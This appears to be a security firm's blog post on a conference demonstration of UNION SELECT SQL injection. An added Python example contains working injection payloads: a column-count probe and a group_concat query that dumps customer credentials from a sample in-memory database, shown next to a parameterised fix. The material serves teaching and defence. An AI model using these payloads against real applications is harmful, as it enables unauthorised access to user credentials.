SQL Injection with UNION SELECT

Cyberis exhibited at the CEE Cyber and Information Security Showcase, Vienna, Austria on 13th February and 14th February 2013.

At the event we featured a 10-minute web application hacking demonstration, illustrating the retrieval of sensitive data from a vulnerable e-commerce application.

The technique used was a ‘UNION SELECT’ attack: the attacker first identifies the injection point, then forms a syntactically correct UNION statement (one whose column count and column types match the application's original query) to retrieve arbitrary information from the database - in this case valid user credentials for the application from the 'customers' table.

A 'UNION SELECT' attack is the favoured exploitation method in this particular case: error messages are limited (so there is no opportunity to retrieve database content from the messages themselves), and a time-based blind injection is restrictively slow, extracting data a character or a bit at a time. A UNION SELECT instead returns the attacker's chosen data in the application's normal response, and with the ‘group_concat’ aggregate function (available in MySQL) multiple rows and columns can be retrieved in a single query.
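The two steps described above (locating the injection point and fixing the UNION's column count, then pulling the whole 'customers' table through one query with group_concat) as a worked example. This is added illustrative code, not the demonstration code or the HackMe Store application; the 'products' and 'customers' tables, their contents and the search function are constructed here. SQLite is used so the example runs offline, since it offers a group_concat compatible with the MySQL one named in the post; the string-concatenation operator differs (SQLite uses ||, MySQL CONCAT()), and is labelled in the code. The hardened, parameterised search is included alongside the vulnerable one so the same payload can be seen to fail against it.

```python
import sqlite3


def build_db():
    """Constructed sample schema standing in for the demo's e-commerce store;
    the real HackMe Store / osCommerce schema is not reproduced here."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price REAL);
        CREATE TABLE customers (id INTEGER, email TEXT, password TEXT);
        INSERT INTO products VALUES (1, 'Widget', 9.99), (2, 'Gadget', 19.99);
        INSERT INTO customers VALUES
            (1, 'alice@example.com', 'alice123'),
            (2, 'bob@example.com', 'hunter2');
    """)
    return conn


def search_vulnerable(conn, term):
    """The injection point: the search term is spliced into the SQL text."""
    sql = "SELECT id, name, price FROM products WHERE name LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Hardened form: a parameterised query, so the term is only ever data."""
    sql = "SELECT id, name, price FROM products WHERE name LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()


def find_column_count(conn, search, max_cols=10):
    """Step 1: a UNION only parses if both SELECTs return the same number of
    columns, so append UNION SELECT NULL,... with a growing column list until
    the query stops failing. Against a live application the attacker reads the
    same yes/no signal from a generic error page versus a normal page, not from
    any message text; here the driver raises instead."""
    for n in range(1, max_cols + 1):
        # Trailing space after -- so the comment is also valid for MySQL.
        payload = "' UNION SELECT " + ",".join(["NULL"] * n) + "-- "
        try:
            search(conn, payload)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def dump_credentials(conn, search, n_cols):
    """Step 2: a UNION whose column count matches the original SELECT, with
    group_concat folding every customers row into one string so a single
    request returns the whole table. 'AND 1=2' suppresses the genuine product
    rows so only the injected row comes back."""
    # SQLite concatenates with ||; the MySQL form is CONCAT(email, ':', password).
    agg = "group_concat(email || ':' || password, ';')"
    cols = ["1", agg] + ["0"] * (n_cols - 2)
    payload = "' AND 1=2 UNION SELECT " + ", ".join(cols) + " FROM customers-- "
    rows = search(conn, payload)
    creds = []
    for row in rows:
        if row[1]:
            for entry in row[1].split(";"):
                email, _, password = entry.partition(":")
                creds.append((email, password))
    return sorted(creds)


if __name__ == "__main__":
    db = build_db()
    n = find_column_count(db, search_vulnerable)
    print("columns in the original SELECT:", n)
    print("leaked via UNION SELECT:", dump_credentials(db, search_vulnerable, n))
    print("same payload against the parameterised query:",
          dump_credentials(db, search_safe, 3))
```

Run directly, the vulnerable search leaks every customer in one response while the parameterised search treats the identical payload as a harmless pattern and returns nothing; the column-count probe is the part of the attack that makes the UNION "syntactically correct" before any data is requested.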

Some of the highest profile attacks of 2012 were attributed to SQL Injection. The demonstration clearly shows how passing unvalidated input straight into database queries (rather than using parameterised queries) can lead to wholesale abuse of an application and its data.

Cyberis will be releasing a set of ‘patches’ for OSCommerce over the coming weeks, allowing you to reconstruct the vulnerable HackMe Store application in your own test lab. Other common OWASP vulnerabilities will also be included, such as cross-site scripting, inadequate access controls and several session management issues.